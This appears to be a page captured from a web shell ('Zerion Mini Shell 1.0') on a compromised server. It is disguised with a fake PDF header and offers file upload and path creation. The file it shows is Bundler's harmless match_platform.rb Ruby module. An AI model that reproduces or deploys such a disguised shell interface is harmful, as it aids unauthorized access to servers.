%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/share/gems/gems/bundler-1.7.8/lib/bundler/
Upload File :
Create Path :
Current File : //usr/share/gems/gems/bundler-1.7.8/lib/bundler/match_platform.rb

require 'bundler/gem_helpers'

module Bundler
  module MatchPlatform
    include GemHelpers

    def match_platform(p)
      Gem::Platform::RUBY == platform or
      platform.nil? or p == platform or
      generic(Gem::Platform.new(platform)) == p
    end
  end
end

Zerion Mini Shell 1.0